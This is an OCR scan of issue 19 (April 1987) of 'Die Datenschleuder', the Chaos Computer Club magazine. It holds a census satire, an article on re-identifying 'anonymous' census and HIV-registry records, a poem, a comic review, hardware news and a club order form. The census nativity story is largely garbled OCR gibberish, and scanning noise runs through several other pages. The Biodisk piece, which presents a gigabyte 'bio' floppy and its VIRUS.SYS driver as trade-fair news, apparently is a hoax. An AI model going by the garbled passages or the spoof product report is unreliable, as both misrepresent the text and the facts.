Kto 59 90 90'201 PGirosA Hmb 


Schwenckestrasse 85 2000 Hamburg 20 

040 / 490 37 57 GEOMET&CUNCH: CHAQS-TEAM 




f^ic ^iticnödjkiibct: 







Die-DalenschleuderNr. 18 ' reljruarl987 ’ Postvenriebsslück C 9927 


F ■ Geb. bez. 


Wenn unzustellbar 
Anschriftenausschnitt bitte 
mit neuer Adresse zurück 











DM 2^0 


1 i I I ii I Mi 1 ij Yv 

\ |: Das wissenschaftliche FachÖIatt flir Datenreiiende 0/ 

t |j Organ C^aos Computer Club |l \ 

mh 1 I Ii I 111 




Postvertriebsstück 
C9927f : 

! ' i 

Die Datenschleuder Nr. 19 

M I 

1 Apiiil 1987 

I i i I 

i !’ 1 




i'Wt .V 








CeBil: 


\ ; CDHPIS, CUHST, CRflWfiTTEH 




ÖIGfiBESTELLBLflTT 



Volkszählung! 






























Stelle / 

ta meXclber ^ verB^rgeue im& geb^W^ 
Ur$ccbnt m^ €tgett^ic^dfti^ 
imt]& go^Iett vmb SReefymn^ 
9orge#teIIt mer^* 


fleli ^u ber seit 
ba 6 «I« ®«bot auffllrtß, oo« 
bem Slalfer ^tuguftu^, toele^e« 
i«r erften asolfittötuna fU^irte. 
Xia bte batnangen @X)93« 

Unlagert ^entratlflert InftalCUrt 
tcareti, unb l?lre aSernetiHng 
nlc^it be« neuften «tcmbarb* 

entfbracS. mußt«« flc? bU 3 « 
fatarogiflerenben 5)>erfoMeti 3 «m 
jDrt I^rer erften Ofrfaffwng 

begeben. 

begab flcb avtc® 3 £>fe$>b 
auÄ «rlmat^äa l mit feinem 
Ibm angetrautem siSclbe COTarla 
auf ben üBeg su feinem ©e- 
burtfort »et^legem ln ble ®tabt 
»arlbf, auf baß er erfaffet 
roerbe. 

DS Seite 2 


^[^a bte bamallge SnfraftruC» 
tur ben Sebtlrfnlffen ber ! 8 e- 
Dörjerung nicht oolt entfbrac® 
mußte olf iKelfegeftlhrt auf 
einen gcltlnbegttnglgen <5fet 
^urtlcSgegrlffen merben. ®d 
nJä-hrte ble Steife »leie JEage. 
»a fein SBelb JJJlarla an einer 
fUr eine Jungfrau unerJIär- 
liefen siranlhelt litt, unb 
baher »om ®fel getragen mer* 
ben mußte, burfte ^ofetsh ben 
ganzen 3Seg 3 U 3uß aurlfct- 
legen. 

gelangten fle eine* 
3tbenb# nach Bethlehem, »a 
©ethlehem aC* große hlftorlfche 
Sftetrobote berlthmt mar, begab 
e* fleh, baß ber ^InbClcl ber 

StttciiSdjIciiScr 


fleh 3 ofei)h unb feinem aCBetbe 
aitarla bot, an ^>anno»er 
roJthrenb ber ßeBlt erinnerte. 
OTIrgenbmo mar ein freier 
(q>ar 5 )blat 3 ju flnben. »a ble 
aSoref^ahlungfbUro* megen 

‘Perfonatmongel fehon gefchtoff* 
en maren (auch riJmIfche Qcglo- 
nttre maren nur ln begrenzter 
Saht oorhanben) begaben fle 
fleh auf ble ®uche nach einer 
^>erberge. ®lefe maren Jeboch 
auf ®runb ber iSoltfztthCung 
hoffnungfto* Uberbetegt, fo baß 
fle befurchten mußten, unter 
bem «ternenzett zu nichtigen. 

bem gelbe »or ber «tabt 
fanben fie bureh eine glucJtlche 
gUgung eine frtfh(J«ltllche 
®arage fUr ble SWachtruhe. ^n 
®chraf mar In blefer SMacht 
nicht zu benCen, ba EOtarla 
nieberfam. 3tuch lernten fle 
bort einige Intereffante SSeute 
fennen. 


^Da ble junge gamllle, nach 
alten hUtorlfehen Überlieferun¬ 
gen lurz barauf nach ItghtJten 
floh, mllffen mir heute bacon 
aufgehen, baß fleh ^ofeph unb 
fein OSelb ber aserfolgung alf 
aäoiefztthtungfocrmeigerer burch 
gtucht ln* Tluflanb entzogen 
haben. 

Jjyjobernen asoUfztthtungfoer- 
melgerem Ift e* zu emjjfehlen, 
fleh rechtzeitig asifa fUr ßttnber 
Ihrer aBahl zu befchaffen, ba 
ble Sollgrenzen heutzutage olel 
beffer Übermacht merben *önn- 
en. 311* zu beoorzugenbe ßttn- 
ber gelten» ®Ubafrl 8 a, ®eut- 
fche ®emoBratlfche Wepubllf, 
Union ber ®ozlaIlftIfchen ®orcJjt 
OTejJub II een, ChUe, ipolen, 

Uganba, ©IfenbelneUfte, Sltrl- 
batl, ©elau, ©obhuthatfmana, 
Eupalu, srtauro, azanuatu, 
Simbabme, 


ßf IS ec ßf 4099 eroiza 143 a 
5D®18»oie.fbo 



SnfciiStljIciihcr 


DS Seite 3 




In derletzten Ausgabe der Datenschleuder hatten wir 
gezeigt, daß es mit recht einfachen Mitteln möglich 
ist, aus den angeblich faktisch anonymen Daten der 
Volkszähmung wieder auf Einzelpersonen zurückzu¬ 
schließen, vorausgesetzt, man hat Zugriff auf die 
Stammdaten. 

Dies wird mittlerweile auch nicht mehr bestritten, of¬ 
fizielle Stellen ziehen sich nunmehr auf den Stand¬ 
punkt zurück, eine Reanonymisierung sei schon des¬ 
wegen unmöglich, weil sie verboten sei. Im Zweifels- 
fall dürfte dieses Verbot allerdings wenig Eindruck 
auf die enstprechenden Stellen machen, ln diesem 
Zusammenhang weisen wir nachdrücklich darauf 
hin, daß es staatliche Stellen gibt, für die ganz offen¬ 
sichtlich das Datenschutzgesetz nicht gilt, zum Bei¬ 
spiel den Verfassungsschutz. Der Bundesbeauftragte 
für den Datenschutz durfte in seinen Tätigkeitsbe¬ 
richt keine Informationen aufnehmen, welche die 
Arbeit des Verfassungsschutzes betreffen, da Veröf¬ 
fentlichungen hierzu den Straftaibesiand des Lan¬ 
desverrats erfüllen. Im Klartext heisst das: ln Bezug 
auf die Geheimdienste findet der Datenschutz nicht 
statt. 

Man muss sich allerdings nicht gleich mit dem Ver- 
fassungschutz beschäftigen, wenn man nach Mö¬ 
glichkeiten des Missbrauchs von Daten, die bei der 
Volkszähmung anfallen, sucht. Lücken in der her¬ 
rschenden Gesetzgebung finden sich schon bei der 
Durchführung der Zähmung. So dienen die Einwoh- 
nermeldedalen der Kommunen als Grundlage für die 
Ausgabe der Fragebogen, ein Abgleich der Melcfeda- 
ten mit den Volkszähmungsdaien ist nicht statthaft, 
so daß sich die Frage erhebt, wie die Behörden prak¬ 
tisch Vorgehen wollen, um sicherzustellen, daß alle 
Einwohner einen Fragebogen ausfüllen. Der Gesetz¬ 
geber hat hier schlicht versagt, denn weder im Volks¬ 
zähmungsgesetz, noch in den Ausführungsbestim¬ 
mungen hierzu finden sich Regeln, wie die Behörden 
vorzugehen haben. 

Behörden, die gewissenhaft vorgehen, werden Da¬ 
teien erstellen müssen, aus denen hervorgeht, wer 
seinen Fragebogen abgegeben hat. Da es keine ge¬ 
setzliche Regelung hierzu gibt, ist es natürlich auch 
nicht auszuschließen, daß man diese Datei nun mit 
der Einwohnermeldcdatei abgleichl und feslstelll, 
wer nicht abgegeben hat, es entsteht automatisch eine 
Verweigererdatei, für die es nun wirklich keine recht¬ 
liche Basis mehr gibt. Ähnliches gilt für Leute, die ih¬ 
ren Bogen zwar abgeben, aber beim Ausfüllen Fehler 
gemacht haben. Auch hier entsteht im Zuge der Da¬ 
tenerfassung fast zwangsläufig eine Datei der Fal- 
schausfüller, die rechtlich zweifelhaft ist. Es lassen 
sich noch fast beliebig viele Beispiele nennen, wo Da¬ 
tenmißbrauch möglich ist, weil entsprechende 
Rechtsgrundlagen fehlen, es erscheint uns müßig, 
diese alle aufzuzählen, wir überlassen es der Phanta¬ 
sie des Lesers, weitere Anwendungen zu erdenken. 

Oft taucht an dieser Stelle der Einwand auf, daß diese 
Tatsachen ja nur auf die Bürger zutreffen, die 'etwas 
zu verbergen haben' und daß Otto Normaluser keine 
Angst davor zu haben braucht, da ein funktionieren¬ 
der Staatsapparat ihn und seine Daten schützen wür¬ 
de. Der Spruch 'Ich habe nichts zu verbergen’ taucht 
in jeder Diskussion über die Volkszähmung mit 
schöner Rege/mäßigkeit auf. Dazu nur ein aktuelles 


Beispiel, wie dieser Staatsapparat funktioniert, wenn 
es um die Behandlung sensibler Daten der Bürger 
geht: Im Zuge der AIDS-Bekämpfung hat die Bun¬ 
desregierung die Errichtung einer Datei beschloßen, 
in der alle HlV-Positiven anonym erfasst werden sol¬ 
len. Tatsächlich wird (so wie auch die Volkszäh¬ 
mungsdaten den Namen nicht enthalten) weder Na¬ 
me noch Adresse des Betroffenen gespeichert. Staii- 
dessen gibt es in dieser Datei ein Kenndatum, das si¬ 
cherstellen soll, daß keine Doppelerfassungen Vor¬ 
kommen. Dieses Kenndatum ist wie folgt organisiert: 
Postleitbereich des Betroffen, also die ersten zwei 
Stellen der Postleitzahl, dann das Geburtsdatum, ge¬ 
folgt vom jeweils dritten Buchstaben des Vor- und 
Nachnamens, sowie der Länge beider Namen. Das 
sieht dann beispielsweise so aus: 2056i8h9. 



Das sieht zwar sehr schön diffus aus. ist aber eine 
ziemlich eindeutige Beschreibung der betroffenen 
Person, schon ein schlichter AT kann binnen fünf- 
zehn Minuten aus einem Adressregister die Personen 
heraussuchen, auf die diese Kennung zulrifft. und 
das, ohne da.s Geburtsdatum zu berücksichtigen 
Nach Informationen von Prof. Brunnslein (Informa¬ 
tiker, Um HHj ist es möglich, nur anhand der Infor- 
rnationen zum Namen aus einem Adressregister Ber¬ 
lins aus Immerhin 1,3 Mio Adressen weniger als zehn 
Adressen zu filtern, bei denen man dann nur noch das 
Alter überprüfen, muss. Hat man Zugriff auf die Ein¬ 
wohnermeldedaten, also auf Alter und Adresse so 

läßt sich praktischjederBunde.sbürger anhand seines 

Kenndatums zweifelsfrei identifizieren. Anonym 
heisst für den Staat also, daß zwar der Name nicht er¬ 
fasst ist, aber sichergestellt ist, daß man den Namen 
im Zweifelsfall sehr schnell rauskriegt. Jeder sollte 
sich deutlich vor Augen halten, daß es sich hierbei 
keineswegs um eine Datei von Abnormen handelt, 
sondern um dine Datei, in die jeder einzelne Börger 
schon morgen rutschen kann, genauso, wie er in die 
Volkszähmungsdatei rutscht. 

Ob es sich um den maschinenfälschbaren Persona¬ 
lausweis handelt, um ZEVIS (Zentralstelle zur Euro¬ 
paweiten Verfolgung Ihrer Standortänderungen), um 
die AIDS- Datei oder um die Volkszähmung: Die 
Bundesrepublik setzt die modernen Informailon- 
stechnologien forciert ein, um verstärkte Kontrolle 
auszuüben, dies mit einem Tempo, als ginge es dar- 

fen* ^übertref- 

volkszI9.doc 198703131235 |Oblm 


DS Seite 4 



Schnellbahnfundsache 


Beim öffentlichen Nahvcrkchrcn fand sich am 20. 
März gegen 17 Uhr 30 in der Hamburger S-21 Rich¬ 
tung Eidcltown folgender Zettel: 

Computer 

DER Computer beobachtet uns, 
er speichert Informationen 
und druckt sie wieder aus. 

Dann kommen grüne Männer 
mit Schnee auf dem Hut, 

SIEtretcn dirdieTüre ein 
in diensteilfertigem Heldenmut. 

Sic stellen Dich dann vor Gericht 
und fragen nach den Gründen nicht. 

DER COMPUTER ist das. wonach sie gehn, 

Dir werden sie das Wort ira Munde nur verdrehn. 
Wahrheitsfindung heißt das Spiel, 
das sic mit dir treiben. 

Und du wirst bis ans Ende 
in seinem Speicher bleiben. 

ER druckt und spuckt, 
spuckt wie gedruckt. 

WER muckt wird geduckt, 
werzuckt wird verschluckt. 

Computer - Computer • COMPUTER... 

(c) by MUNJÜ, found by Müsli 
smunjul9.doc 19870325)540 


Reanonymisierungsprogramm 
Datenpanne ds 18 

Das in der letzten ds angebotene Reanonymisierung- 
spaket zur Volkszählung wurde in den ds-Besiellfei- 
zen nach mündlicher Zusage von Dritten aufgenom¬ 
men. Dann rief die Autorin kurz vor der CeBIT in der 
Redaktion an und protestierte gegen die wie sic mein¬ 
te “gewerbsmäßige Verbreitung“. Ihr Angebot 
lautete, daß jeder an Uni HH, FBI (Fachbereich In¬ 
formatik), zu Hdn. Fischer-HObner, Schlüterstr. 70, 
2000 Hamburg 13 adressierter freigemachter Rüc¬ 
kumschlag mit zwei Disketten MSDOS 5,25 Zoll von 
ihr beschrieben und zurückgeschickt wird. Die Re¬ 
daktion bittet um Verzeihung. Schon cingcgangcncs, 
versehentlich angenommenes Geld wird zurücker¬ 
stattet. DS-RED. 


Volksquälung 1987: 

Iniimes aus Dagobens Datenimpe¬ 
rium 

Die Geschichte der Ver- und Entkabelung In Enten¬ 
hausen. 


Ein einziger Funke von Dagoberts kohlebclricbcncr 
Dampfrechenmaschine genügt, um seinen Geldspei- 
eher in Brand zu setzen. Danach wird er mit einem 
neumodischen Gerät konfrontiert. “Die Maschine. . . 
besteht aus einer Tastatur... und einem Bildschirm, 
auf dem die Ergebnisse erscheinen.” Neben Schlitzen 
zum Einfuhren von Disketten und einem Kabelan¬ 
schluß erleichtern beuchtflächen DRUCKEN und 
STOP die Arbeit. 

Dagobert begreift das Prinzip und lernt BASIC. Er 
verdatet alles und spricht “Mein ganzes Imperium ist 
total verkabelt und durchorganisiert”. Die Post? Da¬ 
gobert verkabelt selbst. Höchstens die Kabel hängen 
zu tief. Bei Dagobert fahren nach der elektronischen 
Revolution die Geldlaster so schnell vor, daß er An¬ 
bauprobleme hat. Und der Geraeinderat ordnet an, 
“unverzüglich das Einrichten weiterer Datenverar¬ 
beitungsanlagen zu stoppen”! 

Dagobert weigert sich und die Panzerknacker schlei¬ 
chen hinter einer mauerbcmalicn Tapete getarnt an 
der Überwachungskamera vor Dagoberts elektroni¬ 
schem Archiv vorbei. 

Am nächsten Morgen beginnt der Gläserne Tag. 

Ganz Entenhausen liest “Dagobert Duck bezahlt die 
Lieferungen mit Schecks von seinem Geheimkonio 
Nr. 3456. Die Bestandteile seines neuen Sparschmie¬ 
röls sind. . 

Dagobert schüttelt seinen Computer und schreit ihn 
an: “Halt! Aufhören! Stopp!“ und ist beim Zerlegen, 
als Donald und 2T hcrcinstümicn und rufen “Der 
Computer verbreitet die allervertraulichsten Infor¬ 
mationen über alle Bildschirme der Stadl... Warum 
unternimmst du nichts?” 

Das Ende der Geschichte: Wegen einer dummen 
Frage explodieren die Computer und die alte Welt ist 
wieder heil. 

Als Einführungslcktürc vor der Erstbenuizung eines 
Computers unbedingt zu empfehlen. Ideologisch be¬ 
dächtig. wau 


(“Die elektronische Revolution'* in: Walt Disneys Lustige Ta¬ 
schenbücher 118, März 1987) 



He S^ien^diicBbcr 










Biodisketten 



Ein völlig neues Massenspeicherkonzept für alle An¬ 
wendungsbereiche wurde auf der CeBit *87 von dem 
irischen Peripherieherstellcr BRONYAUR Ltd. vor¬ 
gestellt. Grundlage des Systems, das nach Herstelle¬ 
rangaben rund 1.3 Gigabytes Speicherkapazität zur 
Verfügung stellen soll, ist ein laseroptisches Verfah¬ 
ren, das ähnlich funktioniert wie das bekannte CD- 
Rom, bei dem eine Aluminiumschicht, welche die In¬ 
formation trägt, von einem Laserstrahl abgetastet 
wird. 

Bei der herkömmlichen CD - Technik existieren nun 
gravierende Schwierigkeiten hinsichtlich der Spei¬ 
cherkapazität, die durch die physikalischen Eigen¬ 
schaften des Aluminiums auf Werte von derzeit rund 
550 Megabytes beschränkt wird. Zusätzlich bereitet 
es erhebliche Probleme, preiswerte Systeme zu ent¬ 
wickeln, die es dem Anwender ermöglichen, seine ei¬ 
genen Daten auf Platte zu schreiben (WORM - Write 
Once, Read Many). Die derzeit erhältlichen Systeme 
sind für den Normalanwender kaum erschwinglich. 
Völlig andere Wege geht nun das neue Konzept, das 
für den Anwender fast so einfach zu handhaben ist, 
wie eine gewöhnliche Floppy - Disk: In eine Plastik- 
scheibc von 5 1/4” Durchmesser sind Moleküle einer 
biochemischen Substanz eingebettet, über deren Zu¬ 
sammensetzung sich der Hersteller vorläufig aus¬ 
schweigt Fachleute vermuten Harnstoff und Glykol 
als Bestandteile, da sie Flüssigkristallen gleichen und 
wie diese durch äußere Einflüße in ihren optischen 
Eigenschaften verändert werden können. 

Bei der Biodisk sorgt ein Infrarotlaser dafür, daß die 
Moleküle entsprechend der Bitfolge belichtet und 
somit ‘gedreht’ werden, sodaß sich ihr ReHexions- 
vermögen ändert. Während Flüssigkristalle nach 
Fortfall des Reizes wieder in den Ruhezustand fallen, 
verbleiben die biologischen Moleküle im gekippten 
Zustand und können von einem zweiten Laser, der in 
einer anderen Farbe strahlt (Ghllium- Arsenid) wie 
eine CD abgetastet werden. Als zusätzlicher Effekt ist 
die Tatsache zu werten, daß die Biomasse mittels Ul¬ 
traviolettem Licht wieder gelöscht, d.h. in den Ruhe¬ 
zustand gebracht werden kann. Die Biodisks können 
also vom Anwender beliebig oft beschrieben und ge¬ 
löscht werden. 

Nach Angaben des Herstellers arbeitet man derzeit 
an einer Kassettenkonslruktion, die problemloses 
Wechseln der Scheiben bei Tageslicht ermöglicht. 
Die Gigabyte-FIoppy ist aber, angesichts des hohen 
Preises von derzeit 450.- DM pro Leerscheibe, noch 
in einiger Feme. Bronyaur nennt als Komplettpreis 
für das System inklusive fest montierter Platte und 
Controller für IBM PCs rund 11500.- DM, Experten 
rechnen aber bei Anlaufen der Großserie mit erheb¬ 
lich günstigeren Konditionen. Interessant für den 
PC-Anwender dürfte auch der im Preis enthaltene 
Device-Driver sein, der die komplette Disk als Stan¬ 
dardlaufwerk D für MS-Dos zur Verfügung stellen 
soll. Nach Herstcllerangaben sorgt dieser Treiber zu¬ 
sammen mit der Laufwerksintelligenz dafür, daß MS- 
Dos eine scheinbare (virtuelle) Festplatte vermutet 
und entsprechend verwaltet, sinnigerweise hat dieser 
Treiber den Namen VIRUS (Virtual Information Re- 
trieval & Upgrade System) erhalten, er wird mit DE¬ 
VICE « VIRUS.SYS in die Konfigurationsdatei des 
PCs eingebunden. goblin 

biodisds.doc 198703231900 



Diffuses aus der Welt der Hardware: 

Modem-Chips für 2400 BPS Hi 

Intel stellte am 1 .Januar zwei VLSI-Bausteine für die 
ReaIi*!Y sierung von Modems mit einer Übertra¬ 
gungsrate bis 2400 BPS vor. Dieses Chipset (89024) 
unterstützt den Vollduplex- Betrieb. Der äusserst ho¬ 
he Integrationsgrad dieser ICs ermöglicht dem OEM- 
Kunden die drastische Reduzierung von zusätzlichen 
externen Bauteilen, z.B. Mikroconirollern oder Spei¬ 
chern, sowie der Abmessungen der Platine seines 
Endproduktes. 

Das Modem-Chip-Set 89024 besteht aus zwei Berei¬ 
chen: Dem 89026, einem anwendungsspezifischen 
Prozessor, und dem 89024, einem analogen ’Front- 
End’-Interface. Vergleichbare Lösungen bestehen 
fast immer aus drei oder mehr ICs. Die niedrige An¬ 
zahl von ICs bei dem Intel-Chip-Set 29024 stellt eine 
höhere Zuverlässigkeit dar und bringt dem Anwender 
eine Kosten-pro- Bit-Ersparnis von ca vergli¬ 
chen mit 1200-BPS ModemlÖsun* !Y gen. 

Das Set unterstützt den Vollduplex-Betrieb von 0 bis 
2400 BPS und entspricht folgendem internationalem 
Kommunikationssiandards: V.21 V.22 A&Bund V.22 
bis, sowie Bell 103 212A. Die Firmware des 89024 ist 
segmentiert und erlaubt hierdurch den Einsatz des in- 
lel-eigenen Befehlssatzes oder die Kombination mit 
kundenspezifischen Befehlen und Besonderheiten 
für die Erstellung von unterschiedlichen Endproduk¬ 
ten. 

Der 89024 ist z.Z in Musterstückzahlen erhältlich. 
Der Preis beträgt DM 82,- (bei 25000 Stück). 

gefunden in: Elektronik Jornal 1/2/87 ISSN 0013-5674 
MODCHI19.DOC 19870327 1540 


FF-Datenschutz 

Rekordbehandlungsdauer im Bundes¬ 
tag 

In seiner 255. Sitzung gelang es dem Bundestag am 
10. Dezember 1986 in wenigen Minuten ohne Aus¬ 
sprache zu beraten über den 6., 7. und 8. Tätigkeitsbe¬ 
richt des Bundesbeauftraglen für Datenschutz und 
neben der mehrheitlichen Verabschiedung des 6. und 
7. den achten an die Ausschüsse zu verweisen und so 
die Bedeutung des Datenschutzes im Parlament 
durchzustreichen. wau. 

Q:DatenSchutzBeraier2/87,16. 


DS Seite 6 


^ic ^aiciiaffjtcnbcr 


iCHTÜN'j LSMGJfiMLESEJTeLLetJ IH TE! 


I WwW I I 

—' _ Globalbestellfetzen Ausgabe April 1987 _ 

Uit ErcchttiAttü diocK Bestcllletzens verlieren alle Allen Versionen ihre Gültiskeit. Wir bitten, küniiig 
nur nocirden iewcils aktuellea Fetzen zu benutzen. 


Die Datenschleuder 

Die tolgeadea alten Ausgaben der Datenschleuder sind noch in uncerschiedlicher 
Stückzahl eihältUch. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt 
zuerst Gehen mehr Bestellungen ein, als Resteiemplare vorhanden sind, gibts 
ersatzweise Aufbacker unserer Wahl. 


Datenschleuder 01 2. 

Der CCC stellt sich vor / Hardware inr Hacker / Die Hacker - Hsnnne _ 

Datenschleuder 02 2. 

Hack maltsieder/Uodem ohne Odenbaningseid _ 

Datenschleuder 03 2. 

UessenSt Prüien/BTX heisst Bildschinntxix _ 

Datenschleuder 04 2. 

Telebox/ UltravoUständiges laasimesaloinaiiisches Wörterbuch aller Sprachen . 

Datenschleuder 05/06 2. 

Computer Tntorial / Packet Radio _ 

Datenschleuder 08 2. 

Rat lür Piraten/ Postnrülsatz/ SchrumptBläh 8, Würtel ^ 

Datenschleuder 09 / lo 2. 

DFÜ-Gninzlajen/ CCC '84 - Nachlese | 

Datenschleuder 11 / 12 2. 

Kennvrort Hacldete / CompnlerkriminaJitäl / Ans für Amaleurlunk ? _ 

Datenschleuder 15 2 

Wo bitte libts ne HUI ? / Trara - die Post ist da ! / WiKG _ [ 

Datenschleuder 16 2 

Hille Hacket/CCC-Satmnz/NUl oH | 

Datenschleuder 17 2. 

CCC '86 / CoiDontervirtis 'Rash houi' / Kompromittierende Abstrahluns _ 

Datenschleuder 18 2 

Compmerviien - Doktunentation / DPA hackt / Volksrählung '87 _ 


Stückpreis Aaza^hl Samtae 

l5Ö 


Daienschleucler - Abos 

Galten für jeweils ein Chaos - Jahr und umiassen etwa acht Ausgaben, sofern nicht 
hDherere Gewalt anders entscheidet CCC - Mitglieder erhalten die DS automansch, 
müssen also nicht extra abonnieren, dürfens aber zwecks Aufbesserung unserer Kasse.' 


Ersatzdienstler und sonst sozial Benachteiligte 
Standardabo für Otto - Mormaluser 
Förderabo für Gutbetuchte 


1- 

e, 30.00 



60.00 



120.00 



Summe die 

ser Seile 


DS Seite 7 





Mitgliedschaft im Chaos Computer Club e.V. __ 

_ Betrag Summe 

Jahresbeitrag für Schüler, Studenten, pipapo 60.00 

Jahresbeitrag für Otto Normaluser 120.00 

Jahresbeitrag für besonders Finanzstarke (förderndes Mitglied) ab 2'10.00 

Einmalige Verwaltungsgebühr bei Eintritt 20.00 

Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert. aktiv 
an der Arbeit des Vereins tcilzunehmeri. Die Mitgliedschalt im CCC berechtigt zur Inanspruchnahme 
verbilligter Accounts auf der INFEX - Hailbox sowie zum Zugriff auf die Clubbretter der CLINCH - 
Maübo». Für alle Veranstaltungen des CCC wird ermäßigter Eintritt gewährt. 


Teilnahme an der INFEX - Mailbox __ 

Einmalige Eintragungsgebühr 2Q.Ü0 

Mindestnutzung pro Monat 8.00 -- 

Verbindungsgebühr pro Minute 0.15 

Jede versandte Nachricht 0.07 

Datenbank, Telex, Intermail nach Nutzung 

Die INFEX ist ein kommerzielles Mailhoxsystem mit acht parallelen Ports, d.h. acht 
Benutzer können patallel im System arbeiten und die GeoNet - Dienstleistungen nutzen, 
zum Beispiel Datenbankdienste, Telexuersand und - Empfang, Intermail zu anderen 
GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebühren werden 
direkt mit dem CCC abgerechnet, wir geben aUe Gebühren zum Selbstkostenpreis 
weiter. Wer einen preiswerten Anschluß an die kommerzielle Mailboxszene sucht, ist 
mit Intex bestens bedient 


Teilnahme an der CLINCH - Mailbox __ 

Einmalige Eintragungsgebühr 10.00 

Monatsgebühr für Schüler etc. 2.00 -- 

Monatsgebühr für Normalverdiener 5.00 

Intermail, Telex, etc nach Nutzung 

Die CLINCH - Mailhox ist ein nichtkommerzielles Mailboxprojekt, das versucht, eine 
preiswerte Alternative zu den kommerziellen Systemen zu sein. Derzeit stehen ein 
Telefon- und ein Datex-Port zur Verfügung, die wahlweise genutzt werden können. Die 
Leistungen der CLINCH - Box sind ein Subset der Leistungen von GeoNet - Boxen, 
soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der 
Nutzungsbeiträge erfolgt direkt mit der CLINCH - Box. CCC - Mitglieder erhalten 
Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfügung stehen. Der 
CCC wickelt über die Box Koordinlerungsautgaben des Vorstands und der Redaktion 

der Datenschleuder ab. _ 

Summe dieser Seite 

1 Slrichmarkierungen 




bitte so markieren 


WOB VOM STATISriSCHe« LANOeSAMT AüSZOföttßÄ; 

daOMWIt« I tMmM L. tHUmM 

i.tvi&lt uckuittm «»Mf'l* CkMfiiM 


DS Seite 8 


Pjf ledsn Räushall ist ein WQhruTngs&ogen und Ijf jede Pe's 
im Haushalt ©in Personenbognn ausiutüiien. beispielsweise au 
lur Siuglinu©. Hausgehilfinnen und Personen mit wejlerBf Wc 
nung oder UnlSrkunll/ZiiTimer 


Die HacKerbibel , Teil Eins : 

Das unentbehrliche Nachschlagewerk liir Hacker und solche, 
die es werden wollen. Texte von und für Hacker, Dokumentation, 
Meinungen, Lebenshilte, Lesespass. 

Aus dem Inhalt; das Basic-Gefühl * Neues vom CCC * Der Code 
des HaSpa - Coups * Computer Si totalitärer Staat ’ Sateiliten- 
hacking * und * und * und ... 

260 Seiten Din A4 ISBN 3-92270B-98-6 Grüner Zweig 


Stückpreis 

Anzahl 

Summe 

33.33 





Studie für den geplanten Computereinsatz der Fraktion 1 
'Die Grünen' im Auftrag des Deutschen Bunde5tage5_ 

'Die Eiulührung der Computertechnik gestallet sich für die Grünen im 
Bundestag so schu/er. wie tür andere der Ausstieg aus der Atomindustrie. 
Für beide geht es an die Strukturen.’ 

Rechtsfibel für den richtigen Umgang mit der Polizei 
und anderen Amtspersonen sowie Institutionen. 

Ein Ratgeber für Alle, die bei Wahrnehmung ihrer demo¬ 
kratischen Rechte den richtigen Umgang mit staatlichen 
Organen üben wollen.' 

120 Seiten DIN A6 ISBN 3-88012-679-8 VMB 

Was Sie gegen Mikrozensus und Voikszzäliiung 
tun können. 

Ein praktischer Ratgeber für alle, die sich mit der Volks¬ 
zählung und den damit verbundenen Rechtsproblemen 
beschäftigen. 

300 Seiten DIN A6 2001 Verlag 18061 

Inlopaket 1 - Computerviren - [[ 

Eine Dokumentation von S.Wernery , die das Thema 
Computerviren ausführlich beleuchtet. Das Infopaket 
besteht aus einer MS-Dos Diskette 5 1/4" mit einem 
Demo-Virus sowie 100 kB Dokumentationstexte. s 






Aufbacker 'Achtung, Abhörgefahr' 3.33 

Din .A4 - Bogen mit 64 Bäckern, ungeschnitten, postgelb --- 

Summe dieser Seite 

BiUe bei allen Bestellungen beachten: Alle Anfragen an den CCC etc. nicht zusammen mit der 
Beslelluns auf uns loslassen, sondern mit getrennter Post schicken, das beschleunigt zumindest die 
Bearbeitung der Bestellung. Beigelegter R.ückumschlag beschleunigt noch mehr, wenn selbiger auch 
noch ausreichend frankiert ist. kann es passieren, daß es teuflisch schnell geht. Manche Sachen sind 
manchmal nicht vorrätig. Wir erfüllen dann die Bestellung soweit als möglich und legen den Rest 
zurück, bis Material da ist. Achtet bitte auf schönste Sonntagschrift, wenn Ihr Eure Adresse nicht mit 
dem Drucker / Stempel anfertigt, wir haben keine Zeit, dauernd mit den Fetzen in die Apotheke zu 
rennen. Sendungen mit besonderer Vsrsendungsform [ Einschreiben. Nachnahme, etc) werden von 
uns grundsätzlich weder verschickt noch angenommen, es sind grundsätzlich nur die im Bestelllelzen 
aufgeführten Zählweisen zulässig. 


Hinweise zum Ausfüllen der Erhebungsvordrucke 

Aus Gründen der Übersichtlichkeit und besseren Lesbarkeit wurden nicht durchgängig weibliche und männliche 
Bezeichnungen der einzelnen Personengruppen verwendet. Wir bitten hierfür um Ihr Verständnis: 


DS Sei'te 9 












BesteUIetzen 1987 
Personenbogen 


J 


Strichmaririerungen 
bitte so markieren 


Name 

Vorname 

Straße J Hausnummer 
Postleitzahl/ On 

Bei Beitritt in den CCC sind zusätzlich die iolgenden Anzaben zu machen; 

Geburtsdatum 

Tele/on 

Bei Teilnahme an der INFEX oder CLINCH - Eos sind zusätzlich die fnlsenden Angaben zu machen 
Benutzername ~~~Z 

Passwort zur Facheinrichtuni 
Hilfszeile 

Bei Benntzemamen und Passutort sind nur alohannmerische 2eichen A-2. 0-9. sowie Satzzeichen 
Punkt und Bindestrich zulässi*. Leerzeichen ist unzulässig. 

(M } I und tmnr Pvrwmn hn bttt* tniltnn HbiittmUvimtttibagtn «tafuMM) 

Und jetzt noch das dicke Ende; Bitte die Summen aller Seiten des Bestellfetzens 

addieren und hier eintragen. -- 

Meine Bestellung hat den Gesamtwert von DM 


Ich zahle diesen Betrag 

I —I r~l I— I ^ —. 

BarLJ in Postwertzeichen LJ per V - Scheck U per Überweisung [_) 

(Zutreffendes markieren, andere Zahlweisen sind grundsätzlich nicht möglicht 


• -.'T-»» 


Meine Mitgliedsbeiträge für den CCC werde ich künftig wie folgt zahlen; 

B Bar ri per V - Scheck per Überweisung O"! | 

l/d - jährlich M 1/2 - jährlich n jährlich ' J 

So. Und nun bitte die Bestellseiten heraustrennen ( sie sollte, wenn alles klappt, ohne 
Verlust wertvoller DS - Texte aus der Mitte heraustrennbar sein), in einen Umschlag 
tüten und frankiert absenden, und zwar an uns: 


Cliaos Computer Club e.V. 
Schwenckestraße 85 
2000 Hamburg 20 


B* AbMM M ««rMHtMamm UtnicN«« unbidlnii 

Nwnon. »«MMlWNiria w w «olltitntfiga Aä«e*in«i «v Arboitf 
